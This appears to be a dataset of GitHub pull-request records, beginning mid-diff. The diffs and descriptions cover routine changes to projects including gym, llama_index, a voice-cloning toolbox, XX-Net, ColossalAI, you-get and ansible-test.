+ def create(prompt: str, proxy: str):
messages = [
{
"content": prompt,
@@ -81,4 +100,4 @@ def create(prompt: str,proxy:str):
"who": "User: ",
},
]
- return ChatCompletion.create(messages=messages,proxy=proxy)
\ No newline at end of file
+ return ChatCompletion.create(messages=messages, proxy=proxy)
\ No newline at end of file
| The restNonce changes automatically every day, so the webpage has to be requested each time to obtain the current restNonce value. | https://api.github.com/repos/xtekky/gpt4free/pulls/601 | 2023-05-25T02:46:18Z | 2023-05-26T14:54:51Z | 2023-05-26T14:54:51Z | 2023-05-26T14:54:51Z | 828 | xtekky/gpt4free | 38,199 |
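In outline, the extraction added above works like this simplified sketch of `get_restNonce` (the regexes are shortened relative to the diff and assume the page structure it captures):

```python
import base64
import re
from typing import Optional

import requests

def fetch_rest_nonce(proxy: Optional[str] = None) -> str:
    proxies = ({"http": "http://" + proxy, "https": "http://" + proxy}
               if proxy else None)
    html = requests.get("https://chatgptlogin.ac/", proxies=proxies).text
    # The nonce lives inside a deferred script whose src is a base64 data URI.
    src = re.search(r'<script defer src="(.*?)">', html).group(1)
    decoded = base64.b64decode(src.split(",")[-1]).decode("utf-8")
    return re.search(r"let restNonce = '(.*?)';", decoded).group(1)
```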
vector env updates | diff --git a/gym/vector/async_vector_env.py b/gym/vector/async_vector_env.py
index 38c72eb2701..d1d4a0809a2 100644
--- a/gym/vector/async_vector_env.py
+++ b/gym/vector/async_vector_env.py
@@ -51,9 +51,23 @@ class AsyncVectorEnv(VectorEnv):
context : str, optional
Context for multiprocessing. If `None`, then the default context is used.
Only available in Python 3.
+
+ daemon : bool (default: `True`)
+        If `True`, then subprocesses have the `daemon` flag turned on; that is, they
+        will quit if the head process quits. However, `daemon=True` prevents
+        subprocesses from spawning children, so for some environments you may want
+ to have it set to `False`
+
+ worker : function, optional
+ WARNING - advanced mode option! If set, then use that worker in a subprocess
+ instead of a default one. Can be useful to override some inner vector env
+        logic, for instance, how resets on done are handled. Provides a high
+        degree of flexibility and a high chance to shoot yourself in the foot; thus,
+        if you are writing your own worker, it is recommended to start from the code
+        of the `_worker` (or `_worker_shared_memory`) method below, and add changes
"""
def __init__(self, env_fns, observation_space=None, action_space=None,
- shared_memory=True, copy=True, context=None):
+ shared_memory=True, copy=True, context=None, daemon=True, worker=None):
try:
ctx = mp.get_context(context)
except AttributeError:
@@ -86,6 +100,7 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self.parent_pipes, self.processes = [], []
self.error_queue = ctx.Queue()
target = _worker_shared_memory if self.shared_memory else _worker
+ target = worker or target
with clear_mpi_env_vars():
for idx, env_fn in enumerate(self.env_fns):
parent_pipe, child_pipe = ctx.Pipe()
@@ -97,7 +112,7 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self.parent_pipes.append(parent_pipe)
self.processes.append(process)
- process.daemon = True
+ process.daemon = daemon
process.start()
child_pipe.close()
@@ -105,16 +120,6 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
self._check_observation_spaces()
def seed(self, seeds=None):
- """
- Parameters
- ----------
- seeds : list of int, or int, optional
- Random seed for each individual environment. If `seeds` is a list of
- length `num_envs`, then the items of the list are chosen as random
- seeds. If `seeds` is an int, then each environment uses the random
- seed `seeds + n`, where `n` is the index of the environment (between
- `0` and `num_envs - 1`).
- """
self._assert_is_running()
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
diff --git a/gym/vector/sync_vector_env.py b/gym/vector/sync_vector_env.py
index 4a8b1cfbcfa..379977ae9e7 100644
--- a/gym/vector/sync_vector_env.py
+++ b/gym/vector/sync_vector_env.py
@@ -45,18 +45,9 @@ def __init__(self, env_fns, observation_space=None, action_space=None,
n=self.num_envs, fn=np.zeros)
self._rewards = np.zeros((self.num_envs,), dtype=np.float64)
self._dones = np.zeros((self.num_envs,), dtype=np.bool_)
+ self._actions = None
def seed(self, seeds=None):
- """
- Parameters
- ----------
- seeds : list of int, or int, optional
- Random seed for each individual environment. If `seeds` is a list of
- length `num_envs`, then the items of the list are chosen as random
- seeds. If `seeds` is an int, then each environment uses the random
- seed `seeds + n`, where `n` is the index of the environment (between
- `0` and `num_envs - 1`).
- """
if seeds is None:
seeds = [None for _ in range(self.num_envs)]
if isinstance(seeds, int):
@@ -66,13 +57,7 @@ def seed(self, seeds=None):
for env, seed in zip(self.envs, seeds):
env.seed(seed)
- def reset(self):
- """
- Returns
- -------
- observations : sample from `observation_space`
- A batch of observations from the vectorized environment.
- """
+ def reset_wait(self):
self._dones[:] = False
observations = []
for env in self.envs:
@@ -82,29 +67,12 @@ def reset(self):
return np.copy(self.observations) if self.copy else self.observations
- def step(self, actions):
- """
- Parameters
- ----------
- actions : iterable of samples from `action_space`
- List of actions.
+ def step_async(self, actions):
+ self._actions = actions
- Returns
- -------
- observations : sample from `observation_space`
- A batch of observations from the vectorized environment.
-
- rewards : `np.ndarray` instance (dtype `np.float_`)
- A vector of rewards from the vectorized environment.
-
- dones : `np.ndarray` instance (dtype `np.bool_`)
- A vector whose entries indicate whether the episode has ended.
-
- infos : list of dict
- A list of auxiliary diagnostic informations.
- """
+ def step_wait(self):
observations, infos = [], []
- for i, (env, action) in enumerate(zip(self.envs, actions)):
+ for i, (env, action) in enumerate(zip(self.envs, self._actions)):
observation, self._rewards[i], self._dones[i], info = env.step(action)
if self._dones[i]:
observation = env.reset()
diff --git a/gym/vector/vector_env.py b/gym/vector/vector_env.py
index 06567641f7c..185b5e0d952 100644
--- a/gym/vector/vector_env.py
+++ b/gym/vector/vector_env.py
@@ -40,6 +40,12 @@ def reset_wait(self, **kwargs):
raise NotImplementedError()
def reset(self):
+ """
+ Returns
+ -------
+ observations : sample from `observation_space`
+ A batch of observations from the vectorized environment.
+ """
self.reset_async()
return self.reset_wait()
@@ -50,9 +56,43 @@ def step_wait(self, **kwargs):
raise NotImplementedError()
def step(self, actions):
+ """
+ Parameters
+ ----------
+ actions : iterable of samples from `action_space`
+ List of actions.
+
+ Returns
+ -------
+ observations : sample from `observation_space`
+ A batch of observations from the vectorized environment.
+
+ rewards : `np.ndarray` instance (dtype `np.float_`)
+ A vector of rewards from the vectorized environment.
+
+ dones : `np.ndarray` instance (dtype `np.bool_`)
+ A vector whose entries indicate whether the episode has ended.
+
+ infos : list of dict
+ A list of auxiliary diagnostic informations.
+ """
self.step_async(actions)
return self.step_wait()
+ def seed(self, seeds=None):
+ """
+ Parameters
+ ----------
+ seeds : list of int, or int, optional
+ Random seed for each individual environment. If `seeds` is a list of
+ length `num_envs`, then the items of the list are chosen as random
+ seeds. If `seeds` is an int, then each environment uses the random
+ seed `seeds + n`, where `n` is the index of the environment (between
+ `0` and `num_envs - 1`).
+ """
+ pass
+
+
def __del__(self):
if hasattr(self, 'closed'):
if not self.closed:
| AsyncVectorEnv updates: allow the `daemon` flag to be turned on or off, and allow custom workers (for customizing reset logic in a vector env); a usage sketch is shown below.
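A hypothetical usage sketch (the environment id is just an example; the argument names match the diff):

```python
import gym
from gym.vector import AsyncVectorEnv

# daemon=False lets worker processes spawn children of their own, at the
# cost of not being killed automatically when the parent process exits.
env = AsyncVectorEnv(
    [lambda: gym.make("CartPole-v1") for _ in range(4)],
    daemon=False,
)
observations = env.reset()
observations, rewards, dones, infos = env.step(env.action_space.sample())
env.close()
```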
SyncVectorEnv: update the API with `step_async` and `step_wait` methods for compatibility. | https://api.github.com/repos/openai/gym/pulls/1706 | 2019-10-09T21:20:42Z | 2019-10-09T22:08:11Z | 2019-10-09T22:08:11Z | 2019-10-09T22:08:18Z | 1,909 | openai/gym | 5,926 |
Added Blockchain | diff --git a/README.md b/README.md
index 2de8f212da..30f7b88295 100644
--- a/README.md
+++ b/README.md
@@ -200,6 +200,7 @@ API | Description | Auth | HTTPS | Link |
API | Description | Auth | HTTPS | Link |
|---|---|---|---|---|
| Barchart OnDemand | Stock, Futures, and Forex Market Data | `apiKey` | Yes | [Go!](https://www.barchartondemand.com/free) |
+| Blockchain | Bitcoin Payment, Wallet & Transaction Data | No | Yes | [Go!](https://www.blockchain.info/api) |
| CoinDesk | Bitcoin Price Index | No | No | [Go!](http://www.coindesk.com/api/) |
| Consumer Financial Protection Bureau | Financial services Consumer Complaints Database | `apiKey` | Yes | [Go!](https://data.consumerfinance.gov/dataset/Consumer-Complaints/s6ew-h6mp) |
| IEX | Stocks and Market Data | No | Yes | [Go!](https://iextrading.com/developer/) |
| Thank you for taking the time to work on a Pull Request for this project!
To ensure your PR is dealt with swiftly please check the following:
- [x] Your submissions are formatted according to the guidelines in the [contributing guide](CONTRIBUTING.md).
- [x] Your changes are made in the [README](../README.md) file, not the auto-generated JSON.
- [x] Your additions are ordered alphabetically.
- [x] Your submission has a useful description.
- [x] Each table column should be padded with one space on either side.
- [x] You have searched the repository for any relevant issues or PRs.
- [x] Any category you are creating has the minimum requirement of 3 items.
| https://api.github.com/repos/public-apis/public-apis/pulls/478 | 2017-09-06T13:04:31Z | 2017-09-06T14:06:17Z | 2017-09-06T14:06:17Z | 2017-09-06T14:06:21Z | 250 | public-apis/public-apis | 35,178 |
Allowing custom text field name for Milvus (#7789) | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 67c4ca7941569..4e6daff48ba4e 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### New Features
- Added native support for `HuggingFaceEmbedding`, `InstructorEmbedding`, and `OptimumEmbedding` (#7795)
- Added metadata filtering and hybrid search to MyScale vector store (#7780)
+- Allowing custom text field name for Milvus (#7790)
- Add support for `vector_store_query_mode` to `VectorIndexAutoRetriever` (#7797)
### Bug Fixes / Nits
diff --git a/llama_index/vector_stores/milvus.py b/llama_index/vector_stores/milvus.py
index 69eb0e0011e15..528bdf7c8c4c7 100644
--- a/llama_index/vector_stores/milvus.py
+++ b/llama_index/vector_stores/milvus.py
@@ -6,9 +6,7 @@
import logging
from typing import Any, List, Optional
-from llama_index.schema import (
- BaseNode,
-)
+from llama_index.schema import BaseNode, TextNode
from llama_index.vector_stores.types import (
MetadataFilters,
VectorStore,
@@ -67,6 +65,8 @@ class MilvusVectorStore(VectorStore):
created collection. Defaults to "Session".
overwrite (bool, optional): Whether to overwrite existing collection with same
name. Defaults to False.
+            text_key (str, optional): Which key the text is stored under in the passed collection.
+ Used when bringing your own collection. Defaults to None.
Raises:
ImportError: Unable to import `pymilvus`.
@@ -91,6 +91,7 @@ def __init__(
similarity_metric: str = "IP",
consistency_level: str = "Strong",
overwrite: bool = False,
+ text_key: Optional[str] = None,
**kwargs: Any,
) -> None:
"""Init params."""
@@ -110,6 +111,7 @@ def __init__(
self.doc_id_field = doc_id_field
self.consistency_level = consistency_level
self.overwrite = overwrite
+ self.text_key = text_key
# Select the similarity metric
if similarity_metric.lower() in ("ip"):
@@ -270,9 +272,21 @@ def query(self, query: VectorStoreQuery, **kwargs: Any) -> VectorStoreQueryResul
# Parse the results
for hit in res[0]:
- node = metadata_dict_to_node(
- {"_node_content": hit["entity"].get("_node_content", None)}
- )
+ if not self.text_key:
+ node = metadata_dict_to_node(
+ {"_node_content": hit["entity"].get("_node_content", None)}
+ )
+ else:
+ try:
+ text = hit["entity"].get(self.text_key)
+ except Exception:
+ raise ValueError(
+ "The passed in text_key value does not exist "
+ "in the retrieved entity."
+ )
+ node = TextNode(
+ text=text,
+ )
nodes.append(node)
similarities.append(hit["distance"])
ids.append(hit["id"])
| # Description
Please include a summary of the change and which issue is fixed. Please also include relevant motivation and context. List any dependencies that are required for this change.
Fixes #7789. A usage sketch of the new `text_key` parameter is shown below.
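A hypothetical sketch (collection and field names are made up; only `text_key` is the new parameter):

```python
from llama_index.vector_stores import MilvusVectorStore

# Bring-your-own collection where the raw text lives under a custom field
# instead of the serialized "_node_content" payload.
vector_store = MilvusVectorStore(
    collection_name="my_existing_collection",
    text_key="chunk_text",
    overwrite=False,
)
```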
## Type of Change
Please delete options that are not relevant.
- [ ] Bug fix (non-breaking change which fixes an issue)
- [x] New feature (non-breaking change which adds functionality)
- [ ] Breaking change (fix or feature that would cause existing functionality to not work as expected)
- [ ] This change requires a documentation update
# How Has This Been Tested?
Please describe the tests that you ran to verify your changes. Provide instructions so we can reproduce. Please also list any relevant details for your test configuration
- [ ] Added new unit/integration tests
- [ ] Added new notebook (that tests end-to-end)
- [x] I stared at the code and made sure it makes sense
# Suggested Checklist:
- [x] I have performed a self-review of my own code
- [ ] I have commented my code, particularly in hard-to-understand areas
- [ ] I have made corresponding changes to the documentation
- [x] My changes generate no new warnings
- [ ] I have added tests that prove my fix is effective or that my feature works
- [x] New and existing unit tests pass locally with my changes
| https://api.github.com/repos/run-llama/llama_index/pulls/7790 | 2023-09-22T19:25:52Z | 2023-09-24T21:21:38Z | 2023-09-24T21:21:38Z | 2023-09-25T16:21:21Z | 741 | run-llama/llama_index | 6,533 |
Added no_mp3_support argument and added a check for ffmpeg installation | diff --git a/demo_cli.py b/demo_cli.py
index 7435552b7..1bd41b883 100644
--- a/demo_cli.py
+++ b/demo_cli.py
@@ -11,7 +11,7 @@
import argparse
import torch
import sys
-
+from audioread.exceptions import NoBackendError
if __name__ == '__main__':
## Info & args
@@ -34,12 +34,23 @@
"If True, audio won't be played.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
+ parser.add_argument("--no_mp3_support", action="store_true", help=\
+ "If True, disallows loading mp3 files to prevent audioread errors when ffmpeg is not installed.")
args = parser.parse_args()
print_args(args, parser)
if not args.no_sound:
import sounddevice as sd
+
+ if not args.no_mp3_support:
+ try:
+ librosa.load("samples/1320_00000.mp3")
+ except NoBackendError:
+ print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
+ "Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
+ exit(-1)
print("Running a test of your configuration...\n")
+
if torch.cuda.is_available():
device_id = torch.cuda.current_device()
gpu_properties = torch.cuda.get_device_properties(device_id)
@@ -123,8 +134,10 @@
message = "Reference voice: enter an audio filepath of a voice to be cloned (mp3, " \
"wav, m4a, flac, ...):\n"
in_fpath = Path(input(message).replace("\"", "").replace("\'", ""))
-
-
+
+ if in_fpath.suffix.lower() == ".mp3" and args.no_mp3_support:
+            print("Can't use mp3 files, please try again:")
+ continue
## Computing the embedding
# First, we load the wav using the function that the speaker encoder provides. This is
# important: there is preprocessing that must be applied.
diff --git a/demo_toolbox.py b/demo_toolbox.py
index f2a2e3b1a..9d310ee80 100644
--- a/demo_toolbox.py
+++ b/demo_toolbox.py
@@ -28,6 +28,8 @@
"overhead but allows to save some GPU memory for lower-end GPUs.")
parser.add_argument("--seed", type=int, default=None, help=\
"Optional random number seed value to make toolbox deterministic.")
+ parser.add_argument("--no_mp3_support", action="store_true", help=\
+ "If True, no mp3 files are allowed.")
args = parser.parse_args()
print_args(args, parser)
diff --git a/samples/1320_00000.mp3 b/samples/1320_00000.mp3
new file mode 100644
index 000000000..f0791b042
Binary files /dev/null and b/samples/1320_00000.mp3 differ
diff --git a/samples/3575_00000.mp3 b/samples/3575_00000.mp3
new file mode 100644
index 000000000..545d784f8
Binary files /dev/null and b/samples/3575_00000.mp3 differ
diff --git a/samples/6829_00000.mp3 b/samples/6829_00000.mp3
new file mode 100644
index 000000000..34f0382f1
Binary files /dev/null and b/samples/6829_00000.mp3 differ
diff --git a/samples/8230_00000.mp3 b/samples/8230_00000.mp3
new file mode 100644
index 000000000..b7c562009
Binary files /dev/null and b/samples/8230_00000.mp3 differ
diff --git a/samples/README.md b/samples/README.md
new file mode 100644
index 000000000..1a392d86e
--- /dev/null
+++ b/samples/README.md
@@ -0,0 +1,22 @@
+The audio files in this folder are provided for toolbox testing and
+benchmarking purposes. These are the same reference utterances
+used by the SV2TTS authors to generate the audio samples located at:
+https://google.github.io/tacotron/publications/speaker_adaptation/index.html
+
+The `p240_00000.mp3` and `p260_00000.mp3` files are compressed
+versions of audios from the VCTK corpus available at:
+https://datashare.is.ed.ac.uk/handle/10283/3443
+VCTK.txt contains the copyright notices and licensing information.
+
+The `1320_00000.mp3`, `3575_00000.mp3`, `6829_00000.mp3`
+and `8230_00000.mp3` files are compressed versions of audios
+from the LibriSpeech dataset available at: https://openslr.org/12
+For these files, the following notice applies:
+```
+LibriSpeech (c) 2014 by Vassil Panayotov
+
+LibriSpeech ASR corpus is licensed under a
+Creative Commons Attribution 4.0 International License.
+
+See <http://creativecommons.org/licenses/by/4.0/>.
+```
diff --git a/samples/VCTK.txt b/samples/VCTK.txt
new file mode 100644
index 000000000..b51455ac3
--- /dev/null
+++ b/samples/VCTK.txt
@@ -0,0 +1,94 @@
+---------------------------------------------------------------------
+ CSTR VCTK Corpus
+ English Multi-speaker Corpus for CSTR Voice Cloning Toolkit
+
+ (Version 0.92)
+ RELEASE September 2019
+ The Centre for Speech Technology Research
+ University of Edinburgh
+ Copyright (c) 2019
+
+ Junichi Yamagishi
+ jyamagis@inf.ed.ac.uk
+---------------------------------------------------------------------
+
+Overview
+
+This CSTR VCTK Corpus includes speech data uttered by 110 English
+speakers with various accents. Each speaker reads out about 400
+sentences, which were selected from a newspaper, the rainbow passage
+and an elicitation paragraph used for the speech accent archive.
+
+The newspaper texts were taken from Herald Glasgow, with permission
+from Herald & Times Group. Each speaker has a different set of the
+newspaper texts selected based a greedy algorithm that increases the
+contextual and phonetic coverage. The details of the text selection
+algorithms are described in the following paper:
+
+C. Veaux, J. Yamagishi and S. King,
+"The voice bank corpus: Design, collection and data analysis of
+a large regional accent speech database,"
+https://doi.org/10.1109/ICSDA.2013.6709856
+
+The rainbow passage and elicitation paragraph are the same for all
+speakers. The rainbow passage can be found at International Dialects
+of English Archive:
+(http://web.ku.edu/~idea/readings/rainbow.htm). The elicitation
+paragraph is identical to the one used for the speech accent archive
+(http://accent.gmu.edu). The details of the the speech accent archive
+can be found at
+http://www.ualberta.ca/~aacl2009/PDFs/WeinbergerKunath2009AACL.pdf
+
+All speech data was recorded using an identical recording setup: an
+omni-directional microphone (DPA 4035) and a small diaphragm condenser
+microphone with very wide bandwidth (Sennheiser MKH 800), 96kHz
+sampling frequency at 24 bits and in a hemi-anechoic chamber of
+the University of Edinburgh. (However, two speakers, p280 and p315
+had technical issues of the audio recordings using MKH 800).
+All recordings were converted into 16 bits, were downsampled to
+48 kHz, and were manually end-pointed.
+
+This corpus was originally aimed for HMM-based text-to-speech synthesis
+systems, especially for speaker-adaptive HMM-based speech synthesis
+that uses average voice models trained on multiple speakers and speaker
+adaptation technologies. This corpus is also suitable for DNN-based
+multi-speaker text-to-speech synthesis systems and waveform modeling.
+
+COPYING
+
+This corpus is licensed under the Creative Commons License: Attribution 4.0 International
+http://creativecommons.org/licenses/by/4.0/legalcode
+
+VCTK VARIANTS
+There are several variants of the VCTK corpus:
+Speech enhancement
+- Noisy speech database for training speech enhancement algorithms and TTS models where we added various types of noises to VCTK artificially: http://dx.doi.org/10.7488/ds/2117
+- Reverberant speech database for training speech dereverberation algorithms and TTS models where we added various types of reverberantion to VCTK artificially http://dx.doi.org/10.7488/ds/1425
+- Noisy reverberant speech database for training speech enhancement algorithms and TTS models http://dx.doi.org/10.7488/ds/2139
+- Device Recorded VCTK where speech signals of the VCTK corpus were played back and re-recorded in office environments using relatively inexpensive consumer devices http://dx.doi.org/10.7488/ds/2316
+- The Microsoft Scalable Noisy Speech Dataset (MS-SNSD) https://github.com/microsoft/MS-SNSD
+
+ASV and anti-spoofing
+- Spoofing and Anti-Spoofing (SAS) corpus, which is a collection of synthetic speech signals produced by nine techniques, two of which are speech synthesis, and seven are voice conversion. All of them were built using the VCTK corpus. http://dx.doi.org/10.7488/ds/252
+- Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2015) Database. This database consists of synthetic speech signals produced by ten techniques and this has been used in the first Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2015) http://dx.doi.org/10.7488/ds/298
+- ASVspoof 2019: The 3rd Automatic Speaker Verification Spoofing and Countermeasures Challenge database. This database has been used in the 3rd Automatic Speaker Verification Spoofing and Countermeasures Challenge (ASVspoof 2019) https://doi.org/10.7488/ds/2555
+
+
+ACKNOWLEDGEMENTS
+
+The CSTR VCTK Corpus was constructed by:
+
+ Christophe Veaux (University of Edinburgh)
+ Junichi Yamagishi (University of Edinburgh)
+ Kirsten MacDonald
+
+The research leading to these results was partly funded from EPSRC
+grants EP/I031022/1 (NST) and EP/J002526/1 (CAF), from the RSE-NSFC
+grant (61111130120), and from the JST CREST (uDialogue).
+
+Please cite this corpus as follows:
+Christophe Veaux, Junichi Yamagishi, Kirsten MacDonald,
+"CSTR VCTK Corpus: English Multi-speaker Corpus for CSTR Voice Cloning Toolkit",
+The Centre for Speech Technology Research (CSTR),
+University of Edinburgh
+
diff --git a/samples/p240_00000.mp3 b/samples/p240_00000.mp3
new file mode 100644
index 000000000..4787405c2
Binary files /dev/null and b/samples/p240_00000.mp3 differ
diff --git a/samples/p260_00000.mp3 b/samples/p260_00000.mp3
new file mode 100644
index 000000000..ff5f5032e
Binary files /dev/null and b/samples/p260_00000.mp3 differ
diff --git a/toolbox/__init__.py b/toolbox/__init__.py
index bdef19e1e..018e5af1e 100644
--- a/toolbox/__init__.py
+++ b/toolbox/__init__.py
@@ -9,7 +9,8 @@
import traceback
import sys
import torch
-
+import librosa
+from audioread.exceptions import NoBackendError
# Use this directory structure for your datasets, or modify it to fit your needs
recognized_datasets = [
@@ -39,7 +40,15 @@
MAX_WAVES = 15
class Toolbox:
- def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir, low_mem, seed):
+ def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir, low_mem, seed, no_mp3_support):
+ if not no_mp3_support:
+ try:
+ librosa.load("samples/6829_00000.mp3")
+ except NoBackendError:
+ print("Librosa will be unable to open mp3 files if additional software is not installed.\n"
+ "Please install ffmpeg or add the '--no_mp3_support' option to proceed without support for mp3 files.")
+ exit(-1)
+ self.no_mp3_support = no_mp3_support
sys.excepthook = self.excepthook
self.datasets_root = datasets_root
self.low_mem = low_mem
@@ -64,7 +73,7 @@ def __init__(self, datasets_root, enc_models_dir, syn_models_dir, voc_models_dir
self.reset_ui(enc_models_dir, syn_models_dir, voc_models_dir, seed)
self.setup_events()
self.ui.start()
-
+
def excepthook(self, exc_type, exc_value, exc_tb):
traceback.print_exception(exc_type, exc_value, exc_tb)
self.ui.log("Exception: %s" % exc_value)
@@ -149,7 +158,11 @@ def load_from_browser(self, fpath=None):
else:
name = fpath.name
speaker_name = fpath.parent.name
-
+
+ if fpath.suffix.lower() == ".mp3" and self.no_mp3_support:
+ self.ui.log("Error: No mp3 file argument was passed but an mp3 file was used")
+ return
+
# Get the wav from the disk. We take the wav with the vocoder/synthesizer format for
# playback, so as to have a fair comparison with the generated audio
wav = Synthesizer.load_preprocess_wav(fpath)
| This is a fix for this [issue](https://github.com/CorentinJ/Real-Time-Voice-Cloning/issues/446). Please let me know if anything else needs to be done. | https://api.github.com/repos/CorentinJ/Real-Time-Voice-Cloning/pulls/517 | 2020-09-01T23:11:59Z | 2020-09-03T22:31:52Z | 2020-09-03T22:31:52Z | 2020-09-03T22:31:52Z | 3,299 | CorentinJ/Real-Time-Voice-Cloning | 27,391 |
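The ffmpeg probe added above boils down to the following check (sample path taken from the diff):

```python
import librosa
from audioread.exceptions import NoBackendError

def mp3_supported(sample_path: str = "samples/1320_00000.mp3") -> bool:
    """Return True if librosa can decode mp3, i.e. ffmpeg (or another
    audioread backend) is available."""
    try:
        librosa.load(sample_path)
        return True
    except NoBackendError:
        return False
```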
Hide the terminal when launching on macOS | diff --git a/start.sh b/start.sh
index 85a6a3705b..84cfb607be 100755
--- a/start.sh
+++ b/start.sh
@@ -3,8 +3,30 @@
SCRIPTPATH="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
cd $SCRIPTPATH
-if hash python2 2>/dev/null; then
- python2 launcher/start.py
+# launch xx-net service by ignore hungup signal
+function launchWithNoHungup() {
+ if hash python2 2>/dev/null; then
+ nohup python2 launcher/start.py 2&> /dev/null &
+ else
+ nohup python launcher/start.py 2&> /dev/null &
+ fi
+}
+
+# launch xx-net service by hungup signal
+function launchWithHungup() {
+ if hash python2 2>/dev/null; then
+ python2 launcher/start.py
+ else
+ python launcher/start.py
+ fi
+}
+
+# get operating system name
+os_name=`uname -s`
+
+# Darwin for os x
+if [ $os_name = 'Darwin' ];then
+ launchWithNoHungup
else
- python launcher/start.py
-fi
+ launchWithHungup
+fi
\ No newline at end of file
| Improves #2761: XX-Net can now launch without showing a Terminal window.
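For reference, a rough Python equivalent of the `nohup ... &` launch used for macOS in the script above (path as in the diff):

```python
import subprocess
import sys

subprocess.Popen(
    [sys.executable, "launcher/start.py"],
    stdout=subprocess.DEVNULL,
    stderr=subprocess.DEVNULL,
    start_new_session=True,  # detach so the parent terminal's hangup is ignored
)
```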
| https://api.github.com/repos/XX-net/XX-Net/pulls/2769 | 2016-04-07T09:28:46Z | 2016-04-09T10:01:22Z | 2016-04-09T10:01:21Z | 2016-04-09T10:01:22Z | 294 | XX-net/XX-Net | 17,102 |
[workflow] fixed community report ranking | diff --git a/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py b/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
index 36cdd9518486..16b8957c1d88 100644
--- a/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
+++ b/.github/workflows/scripts/generate_leaderboard_and_send_to_lark.py
@@ -292,7 +292,13 @@ def generate_user_engagement_leaderboard_image(github_token: str, output_path: s
y = []
if len(total_engagement_count) > 0:
+ ranking = []
for name, count in total_engagement_count.items():
+ ranking.append((name, count))
+
+ ranking.sort(key=lambda x: x[1], reverse=True)
+
+ for name, count in ranking:
x.append(count)
y.append(name)
| ## 📌 Checklist before creating the PR
- [x] I have created an issue for this PR for traceability
- [x] The title follows the standard format: `[doc/gemini/tensor/...]: A concise description`
- [x] I have added relevant tags if possible for us to better distinguish different PRs
## 🚨 Issue number
> Link this PR to your issue with words like fixed to automatically close the linked issue upon merge
>
> e.g. `fixed #1234`, `closed #1234`, `resolved #1234`
## 📝 What does this PR do?
> Summarize your work here.
> if you have any plots/diagrams/screenshots/tables, please attach them here.
This PR fixes the user engagement ranking; the previous code did not sort the list before plotting. The core of the fix is sketched below.
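The essence of the change, with made-up counts -- dict iteration order is insertion order, not value order, so the engagement counts must be sorted explicitly before building the plot axes:

```python
total_engagement_count = {"alice": 3, "bob": 10, "carol": 7}  # hypothetical data

ranking = sorted(total_engagement_count.items(), key=lambda kv: kv[1], reverse=True)
x = [count for _, count in ranking]  # [10, 7, 3]
y = [name for name, _ in ranking]    # ["bob", "carol", "alice"]
```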
## 💥 Checklist before requesting a review
- [ ] I have linked my PR to an issue ([instruction](https://docs.github.com/en/issues/tracking-your-work-with-issues/linking-a-pull-request-to-an-issue))
- [ ] My issue clearly describes the problem/feature/proposal, with diagrams/charts/table/code if possible
- [ ] I have performed a self-review of my code
- [ ] I have added thorough tests.
- [ ] I have added docstrings for all the functions/methods I implemented
## ⭐️ Do you enjoy contributing to Colossal-AI?
- [x] 🌝 Yes, I do.
- [ ] 🌚 No, I don't.
Tell us more if you don't enjoy contributing to Colossal-AI.
| https://api.github.com/repos/hpcaitech/ColossalAI/pulls/2680 | 2023-02-13T09:04:41Z | 2023-02-13T09:04:49Z | 2023-02-13T09:04:49Z | 2023-02-13T09:05:09Z | 203 | hpcaitech/ColossalAI | 11,816 |
fix dailymotion for #609 | diff --git a/src/you_get/extractors/dailymotion.py b/src/you_get/extractors/dailymotion.py
index 8e8851aa3e..988920bb8a 100644
--- a/src/you_get/extractors/dailymotion.py
+++ b/src/you_get/extractors/dailymotion.py
@@ -8,16 +8,12 @@ def dailymotion_download(url, output_dir = '.', merge = True, info_only = False)
"""Downloads Dailymotion videos by URL.
"""
- id = match1(url, r'/video/([^\?]+)') or match1(url, r'video=([^\?]+)')
- embed_url = 'http://www.dailymotion.com/embed/video/%s' % id
- html = get_content(embed_url)
+ html = get_content(url)
+ info = json.loads(match1(html, r'qualities":({.+?}),"'))
+ title = match1(html, r'"title"\s*:\s*"(.+?)",')
- info = json.loads(match1(html, r'var\s*info\s*=\s*({.+}),\n'))
-
- title = info['title']
-
- for quality in ['stream_h264_hd1080_url', 'stream_h264_hd_url', 'stream_h264_hq_url', 'stream_h264_url', 'stream_h264_ld_url']:
- real_url = info[quality]
+ for quality in ['720','480','380','240','auto']:
+ real_url = info[quality][0]["url"]
if real_url:
break
|
| https://api.github.com/repos/soimort/you-get/pulls/614 | 2015-08-28T16:27:46Z | 2015-08-28T16:31:19Z | 2015-08-28T16:31:19Z | 2015-08-28T16:31:19Z | 364 | soimort/you-get | 21,004 |
ansible-test - Update pylint to 2.16.0 | diff --git a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
index f1be4f3432cb2c..d05a4ba72027c2 100644
--- a/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
+++ b/test/integration/targets/ansible-test-sanity/ansible_collections/ns/col/plugins/plugin_utils/check_pylint.py
@@ -15,9 +15,4 @@
# 'Call' object has no attribute 'value'
result = {None: None}[{}.get('something')]
-# pylint 2.3.1 and 2.4.4 report the following error but 2.5.0 and 2.6.0 do not
-# blacklisted-name: Black listed name "foo"
-# see: https://github.com/PyCQA/pylint/issues/3701
-# regression: documented as a known issue and removed from ignore.txt so pylint can be upgraded to 2.6.0
-# if future versions of pylint fix this issue then the ignore should be restored
foo = {}.keys()
